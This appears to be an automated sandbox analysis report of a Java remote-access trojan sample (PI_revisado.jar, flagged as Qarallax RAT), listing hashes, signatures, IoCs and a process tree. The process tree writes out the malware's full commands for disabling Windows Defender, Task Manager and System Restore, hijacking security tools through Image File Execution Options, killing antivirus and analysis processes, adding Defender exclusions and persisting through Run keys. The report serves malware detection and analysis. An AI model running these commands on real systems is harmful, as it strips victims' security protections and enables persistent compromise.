Analysis
-
max time kernel
63s -
max time network
134s -
platform
windows7_x64 -
resource
win7 -
submitted
19-08-2020 07:21
Static task
static1
Behavioral task
behavioral1
Sample
PI_revisado.jar
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
PI_revisado.jar
Resource
win10v200722
0 signatures
0 seconds
General
-
Target
PI_revisado.jar
-
Size
410KB
-
MD5
0922b16b4e870dcf93bff729f84ad597
-
SHA1
259e5380c4655ce5076a89e1f41c4764c1810825
-
SHA256
a4a5c90b835592cb0ed02f3cdd7697c937c2e86fe204ba1a9f1b3f3c52f57963
-
SHA512
51c05bb76c7217e70dd54711dfdcc23b77eec09a3531d01b49c7f9423a8121848e6430c4f4276f2af62193c6fc64010046cfe3c1b80e7577f4c1e6b76259c8e0
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001352d-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1104 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce  java.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ikprqQu = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\TKnJu\\nfOlo.class\""  java.exe
Key created  \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run  java.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\ikprqQu = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\TKnJu\\nfOlo.class\""  java.exe
-
Drops desktop.ini file(s) 4 IoCs
description  ioc  Process
File opened for modification  C:\Users\Admin\TKnJu\Desktop.ini  java.exe
File created  C:\Users\Admin\TKnJu\Desktop.ini  java.exe
File opened for modification  C:\Users\Admin\TKnJu\Desktop.ini  attrib.exe
File opened for modification  C:\Users\Admin\TKnJu\Desktop.ini  attrib.exe
-
Drops file in System32 directory 2 IoCs
description  ioc  Process
File opened for modification  C:\Windows\System32\pLUGR  java.exe
File created  C:\Windows\System32\pLUGR  java.exe
-
Kills process with taskkill 19 IoCs
pid Process 1880 taskkill.exe 1360 taskkill.exe 1144 taskkill.exe 616 taskkill.exe 2068 taskkill.exe 2232 taskkill.exe 2288 taskkill.exe 2336 taskkill.exe 2448 taskkill.exe 1528 taskkill.exe 1240 taskkill.exe 1968 taskkill.exe 2392 taskkill.exe 2480 taskkill.exe 1888 taskkill.exe 1544 taskkill.exe 1988 taskkill.exe 540 taskkill.exe 2168 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1540 powershell.exe 1540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 140 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1104 java.exe -
Suspicious use of WriteProcessMemory 768 IoCs
1104 wrote to memory of 2936 1104 java.exe 237 PID 2936 wrote to memory of 2952 2936 cmd.exe 238 PID 2936 wrote to memory of 2952 2936 cmd.exe 238 PID 2936 wrote to memory of 2952 2936 cmd.exe 238 PID 2936 wrote to memory of 2980 2936 cmd.exe 239 PID 2936 wrote to memory of 2980 2936 cmd.exe 239 PID 2936 wrote to memory of 2980 2936 cmd.exe 239 PID 1104 wrote to memory of 2988 1104 java.exe 240 PID 1104 wrote to memory of 2988 1104 java.exe 240 PID 1104 wrote to memory of 2988 1104 java.exe 240 PID 2988 wrote to memory of 3012 2988 cmd.exe 241 PID 2988 wrote to memory of 3012 2988 cmd.exe 241 PID 2988 wrote to memory of 3012 2988 cmd.exe 241 PID 2988 wrote to memory of 2992 2988 cmd.exe 242 PID 2988 wrote to memory of 2992 2988 cmd.exe 242 PID 2988 wrote to memory of 2992 2988 cmd.exe 242 PID 1104 wrote to memory of 3036 1104 java.exe 243 PID 1104 wrote to memory of 3036 1104 java.exe 243 PID 1104 wrote to memory of 3036 1104 java.exe 243 PID 3036 wrote to memory of 3068 3036 cmd.exe 244 PID 3036 wrote to memory of 3068 3036 cmd.exe 244 PID 3036 wrote to memory of 3068 3036 cmd.exe 244 PID 3036 wrote to memory of 3024 3036 cmd.exe 245 PID 3036 wrote to memory of 3024 3036 cmd.exe 245 PID 3036 wrote to memory of 3024 3036 cmd.exe 245 PID 1104 wrote to memory of 3056 1104 java.exe 246 PID 1104 wrote to memory of 3056 1104 java.exe 246 PID 1104 wrote to memory of 3056 1104 java.exe 246 PID 3056 wrote to memory of 1196 3056 cmd.exe 247 PID 3056 wrote to memory of 1196 3056 cmd.exe 247 PID 3056 wrote to memory of 1196 3056 cmd.exe 247 PID 3056 wrote to memory of 3052 3056 cmd.exe 248 PID 3056 wrote to memory of 3052 3056 cmd.exe 248 PID 3056 wrote to memory of 3052 3056 cmd.exe 248 PID 1104 wrote to memory of 2032 1104 java.exe 249 PID 1104 wrote to memory of 2032 1104 java.exe 249 PID 1104 wrote to memory of 2032 1104 java.exe 249 PID 2032 wrote to memory of 2304 2032 cmd.exe 250 PID 2032 wrote to memory of 2304 2032 cmd.exe 250 PID 2032 wrote to memory of 2304 2032 
cmd.exe 250 PID 2032 wrote to memory of 1224 2032 cmd.exe 251 PID 2032 wrote to memory of 1224 2032 cmd.exe 251 PID 2032 wrote to memory of 1224 2032 cmd.exe 251 PID 1104 wrote to memory of 796 1104 java.exe 252 PID 1104 wrote to memory of 796 1104 java.exe 252 PID 1104 wrote to memory of 796 1104 java.exe 252 PID 796 wrote to memory of 2372 796 cmd.exe 253 PID 796 wrote to memory of 2372 796 cmd.exe 253 PID 796 wrote to memory of 2372 796 cmd.exe 253 PID 796 wrote to memory of 2360 796 cmd.exe 254 PID 796 wrote to memory of 2360 796 cmd.exe 254 PID 796 wrote to memory of 2360 796 cmd.exe 254 PID 1104 wrote to memory of 2336 1104 java.exe 255 PID 1104 wrote to memory of 2336 1104 java.exe 255 PID 1104 wrote to memory of 2336 1104 java.exe 255 PID 2336 wrote to memory of 2884 2336 cmd.exe 256 PID 2336 wrote to memory of 2884 2336 cmd.exe 256 PID 2336 wrote to memory of 2884 2336 cmd.exe 256 PID 2336 wrote to memory of 2396 2336 cmd.exe 257 PID 2336 wrote to memory of 2396 2336 cmd.exe 257 PID 2336 wrote to memory of 2396 2336 cmd.exe 257 PID 1104 wrote to memory of 2880 1104 java.exe 258 PID 1104 wrote to memory of 2880 1104 java.exe 258 PID 1104 wrote to memory of 2880 1104 java.exe 258 PID 2880 wrote to memory of 2784 2880 cmd.exe 259 PID 2880 wrote to memory of 2784 2880 cmd.exe 259 PID 2880 wrote to memory of 2784 2880 cmd.exe 259 PID 2880 wrote to memory of 2728 2880 cmd.exe 260 PID 2880 wrote to memory of 2728 2880 cmd.exe 260 PID 2880 wrote to memory of 2728 2880 cmd.exe 260 PID 1104 wrote to memory of 2416 1104 java.exe 261 PID 1104 wrote to memory of 2416 1104 java.exe 261 PID 1104 wrote to memory of 2416 1104 java.exe 261 PID 2416 wrote to memory of 2460 2416 cmd.exe 262 PID 2416 wrote to memory of 2460 2416 cmd.exe 262 PID 2416 wrote to memory of 2460 2416 cmd.exe 262 PID 2416 wrote to memory of 2940 2416 cmd.exe 263 PID 2416 wrote to memory of 2940 2416 cmd.exe 263 PID 2416 wrote to memory of 2940 2416 cmd.exe 263 PID 1104 wrote to memory of 2848 1104 
java.exe 264 PID 1104 wrote to memory of 2848 1104 java.exe 264 PID 1104 wrote to memory of 2848 1104 java.exe 264 PID 2848 wrote to memory of 2504 2848 cmd.exe 265 PID 2848 wrote to memory of 2504 2848 cmd.exe 265 PID 2848 wrote to memory of 2504 2848 cmd.exe 265 PID 2848 wrote to memory of 1812 2848 cmd.exe 266 PID 2848 wrote to memory of 1812 2848 cmd.exe 266 PID 2848 wrote to memory of 1812 2848 cmd.exe 266 PID 1104 wrote to memory of 656 1104 java.exe 267 PID 1104 wrote to memory of 656 1104 java.exe 267 PID 1104 wrote to memory of 656 1104 java.exe 267 PID 656 wrote to memory of 2384 656 cmd.exe 268 PID 656 wrote to memory of 2384 656 cmd.exe 268 PID 656 wrote to memory of 2384 656 cmd.exe 268 PID 656 wrote to memory of 1092 656 cmd.exe 269 PID 656 wrote to memory of 1092 656 cmd.exe 269 PID 656 wrote to memory of 1092 656 cmd.exe 269 PID 1104 wrote to memory of 1604 1104 java.exe 270 PID 1104 wrote to memory of 1604 1104 java.exe 270 PID 1104 wrote to memory of 1604 1104 java.exe 270 PID 1604 wrote to memory of 1844 1604 cmd.exe 271 PID 1604 wrote to memory of 1844 1604 cmd.exe 271 PID 1604 wrote to memory of 1844 1604 cmd.exe 271 PID 1604 wrote to memory of 1920 1604 cmd.exe 272 PID 1604 wrote to memory of 1920 1604 cmd.exe 272 PID 1604 wrote to memory of 1920 1604 cmd.exe 272 PID 1104 wrote to memory of 2400 1104 java.exe 273 PID 1104 wrote to memory of 2400 1104 java.exe 273 PID 1104 wrote to memory of 2400 1104 java.exe 273 PID 2400 wrote to memory of 1544 2400 cmd.exe 274 PID 2400 wrote to memory of 1544 2400 cmd.exe 274 PID 2400 wrote to memory of 1544 2400 cmd.exe 274 PID 2400 wrote to memory of 828 2400 cmd.exe 275 PID 2400 wrote to memory of 828 2400 cmd.exe 275 PID 2400 wrote to memory of 828 2400 cmd.exe 275 PID 1104 wrote to memory of 1144 1104 java.exe 276 PID 1104 wrote to memory of 1144 1104 java.exe 276 PID 1104 wrote to memory of 1144 1104 java.exe 276 PID 1144 wrote to memory of 2440 1144 cmd.exe 277 PID 1144 wrote to memory of 2440 1144 
cmd.exe 277 PID 1144 wrote to memory of 2440 1144 cmd.exe 277 PID 1144 wrote to memory of 1968 1144 cmd.exe 278 PID 1144 wrote to memory of 1968 1144 cmd.exe 278 PID 1144 wrote to memory of 1968 1144 cmd.exe 278 PID 1104 wrote to memory of 1768 1104 java.exe 279 PID 1104 wrote to memory of 1768 1104 java.exe 279 PID 1104 wrote to memory of 1768 1104 java.exe 279 PID 1768 wrote to memory of 704 1768 cmd.exe 280 PID 1768 wrote to memory of 704 1768 cmd.exe 280 PID 1768 wrote to memory of 704 1768 cmd.exe 280 PID 1768 wrote to memory of 1916 1768 cmd.exe 281 PID 1768 wrote to memory of 1916 1768 cmd.exe 281 PID 1768 wrote to memory of 1916 1768 cmd.exe 281 PID 1104 wrote to memory of 2496 1104 java.exe 282 PID 1104 wrote to memory of 2496 1104 java.exe 282 PID 1104 wrote to memory of 2496 1104 java.exe 282 PID 2496 wrote to memory of 1988 2496 cmd.exe 283 PID 2496 wrote to memory of 1988 2496 cmd.exe 283 PID 2496 wrote to memory of 1988 2496 cmd.exe 283 PID 2496 wrote to memory of 528 2496 cmd.exe 284 PID 2496 wrote to memory of 528 2496 cmd.exe 284 PID 2496 wrote to memory of 528 2496 cmd.exe 284 PID 1104 wrote to memory of 2064 1104 java.exe 285 PID 1104 wrote to memory of 2064 1104 java.exe 285 PID 1104 wrote to memory of 2064 1104 java.exe 285 PID 2064 wrote to memory of 388 2064 cmd.exe 286 PID 2064 wrote to memory of 388 2064 cmd.exe 286 PID 2064 wrote to memory of 388 2064 cmd.exe 286 PID 2064 wrote to memory of 1660 2064 cmd.exe 287 PID 2064 wrote to memory of 1660 2064 cmd.exe 287 PID 2064 wrote to memory of 1660 2064 cmd.exe 287 PID 1104 wrote to memory of 1792 1104 java.exe 288 PID 1104 wrote to memory of 1792 1104 java.exe 288 PID 1104 wrote to memory of 1792 1104 java.exe 288 PID 1792 wrote to memory of 1976 1792 cmd.exe 289 PID 1792 wrote to memory of 1976 1792 cmd.exe 289 PID 1792 wrote to memory of 1976 1792 cmd.exe 289 PID 1792 wrote to memory of 1380 1792 cmd.exe 290 PID 1792 wrote to memory of 1380 1792 cmd.exe 290 PID 1792 wrote to memory of 1380 
1792 cmd.exe 290 PID 1104 wrote to memory of 3008 1104 java.exe 291 PID 1104 wrote to memory of 3008 1104 java.exe 291 PID 1104 wrote to memory of 3008 1104 java.exe 291 PID 3008 wrote to memory of 1568 3008 cmd.exe 292 PID 3008 wrote to memory of 1568 3008 cmd.exe 292 PID 3008 wrote to memory of 1568 3008 cmd.exe 292 PID 3008 wrote to memory of 2524 3008 cmd.exe 293 PID 3008 wrote to memory of 2524 3008 cmd.exe 293 PID 3008 wrote to memory of 2524 3008 cmd.exe 293 PID 1104 wrote to memory of 2528 1104 java.exe 294 PID 1104 wrote to memory of 2528 1104 java.exe 294 PID 1104 wrote to memory of 2528 1104 java.exe 294 PID 2528 wrote to memory of 2588 2528 cmd.exe 295 PID 2528 wrote to memory of 2588 2528 cmd.exe 295 PID 2528 wrote to memory of 2588 2528 cmd.exe 295 PID 2528 wrote to memory of 2584 2528 cmd.exe 296 PID 2528 wrote to memory of 2584 2528 cmd.exe 296 PID 2528 wrote to memory of 2584 2528 cmd.exe 296 PID 1104 wrote to memory of 2580 1104 java.exe 297 PID 1104 wrote to memory of 2580 1104 java.exe 297 PID 1104 wrote to memory of 2580 1104 java.exe 297 PID 2580 wrote to memory of 2092 2580 cmd.exe 298 PID 2580 wrote to memory of 2092 2580 cmd.exe 298 PID 2580 wrote to memory of 2092 2580 cmd.exe 298 PID 2580 wrote to memory of 2612 2580 cmd.exe 299 PID 2580 wrote to memory of 2612 2580 cmd.exe 299 PID 2580 wrote to memory of 2612 2580 cmd.exe 299 PID 1104 wrote to memory of 2644 1104 java.exe 300 PID 1104 wrote to memory of 2644 1104 java.exe 300 PID 1104 wrote to memory of 2644 1104 java.exe 300 PID 2644 wrote to memory of 2080 2644 cmd.exe 301 PID 2644 wrote to memory of 2080 2644 cmd.exe 301 PID 2644 wrote to memory of 2080 2644 cmd.exe 301 PID 2644 wrote to memory of 2068 2644 cmd.exe 302 PID 2644 wrote to memory of 2068 2644 cmd.exe 302 PID 2644 wrote to memory of 2068 2644 cmd.exe 302 PID 1104 wrote to memory of 2668 1104 java.exe 303 PID 1104 wrote to memory of 2668 1104 java.exe 303 PID 1104 wrote to memory of 2668 1104 java.exe 303 PID 2668 wrote to 
memory of 2652 2668 cmd.exe 304 PID 2668 wrote to memory of 2652 2668 cmd.exe 304 PID 2668 wrote to memory of 2652 2668 cmd.exe 304 PID 2668 wrote to memory of 2700 2668 cmd.exe 305 PID 2668 wrote to memory of 2700 2668 cmd.exe 305 PID 2668 wrote to memory of 2700 2668 cmd.exe 305 PID 1104 wrote to memory of 2188 1104 java.exe 306 PID 1104 wrote to memory of 2188 1104 java.exe 306 PID 1104 wrote to memory of 2188 1104 java.exe 306 PID 2188 wrote to memory of 2208 2188 cmd.exe 307 PID 2188 wrote to memory of 2208 2188 cmd.exe 307 PID 2188 wrote to memory of 2208 2188 cmd.exe 307 PID 2188 wrote to memory of 2708 2188 cmd.exe 308 PID 2188 wrote to memory of 2708 2188 cmd.exe 308 PID 2188 wrote to memory of 2708 2188 cmd.exe 308 PID 1104 wrote to memory of 2692 1104 java.exe 309 PID 1104 wrote to memory of 2692 1104 java.exe 309 PID 1104 wrote to memory of 2692 1104 java.exe 309 PID 2692 wrote to memory of 2712 2692 cmd.exe 310 PID 2692 wrote to memory of 2712 2692 cmd.exe 310 PID 2692 wrote to memory of 2712 2692 cmd.exe 310 PID 2692 wrote to memory of 2148 2692 cmd.exe 311 PID 2692 wrote to memory of 2148 2692 cmd.exe 311 PID 2692 wrote to memory of 2148 2692 cmd.exe 311 PID 1104 wrote to memory of 1700 1104 java.exe 312 PID 1104 wrote to memory of 1700 1104 java.exe 312 PID 1104 wrote to memory of 1700 1104 java.exe 312 PID 1700 wrote to memory of 2028 1700 cmd.exe 313 PID 1700 wrote to memory of 2028 1700 cmd.exe 313 PID 1700 wrote to memory of 2028 1700 cmd.exe 313 PID 1700 wrote to memory of 1480 1700 cmd.exe 314 PID 1700 wrote to memory of 1480 1700 cmd.exe 314 PID 1700 wrote to memory of 1480 1700 cmd.exe 314 PID 1104 wrote to memory of 744 1104 java.exe 315 PID 1104 wrote to memory of 744 1104 java.exe 315 PID 1104 wrote to memory of 744 1104 java.exe 315 PID 744 wrote to memory of 2252 744 cmd.exe 316 PID 744 wrote to memory of 2252 744 cmd.exe 316 PID 744 wrote to memory of 2252 744 cmd.exe 316 PID 744 wrote to memory of 2232 744 cmd.exe 317 PID 744 wrote to 
memory of 2232 744 cmd.exe 317 PID 744 wrote to memory of 2232 744 cmd.exe 317 PID 1104 wrote to memory of 2752 1104 java.exe 318 PID 1104 wrote to memory of 2752 1104 java.exe 318 PID 1104 wrote to memory of 2752 1104 java.exe 318 PID 2752 wrote to memory of 2772 2752 cmd.exe 319 PID 2752 wrote to memory of 2772 2752 cmd.exe 319 PID 2752 wrote to memory of 2772 2752 cmd.exe 319 PID 2752 wrote to memory of 1840 2752 cmd.exe 320 PID 2752 wrote to memory of 1840 2752 cmd.exe 320 PID 2752 wrote to memory of 1840 2752 cmd.exe 320 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process
1820 attrib.exe
1768 attrib.exe
1716 attrib.exe
1836 attrib.exe
1844 attrib.exe
1376 attrib.exe
1812 attrib.exe
1796 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\PI_revisado.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:908
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1716
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1836
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\TKnJu\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1844
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\TKnJu\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1376
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\TKnJu2⤵
- Views/modifies file attributes
PID:1812
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\TKnJu2⤵
- Views/modifies file attributes
PID:1796
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\TKnJu2⤵
- Views/modifies file attributes
PID:1820
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\TKnJu\nfOlo.class2⤵
- Views/modifies file attributes
PID:1768
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:2036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\TKnJu','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\TKnJu\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1540
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1888
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1892
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1972
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1480
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:268
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:812
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1088
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1236
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1960
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1508
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1584
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1816
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1868
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1872
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1880
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1964
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1996
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1672
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1528
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1716
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1828
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1240
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:1484
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1360
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1144
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1544
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1968
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1988
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:616
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:540
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:2068
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2168
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2232
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2288
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2336
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2392
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2448
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2516
-
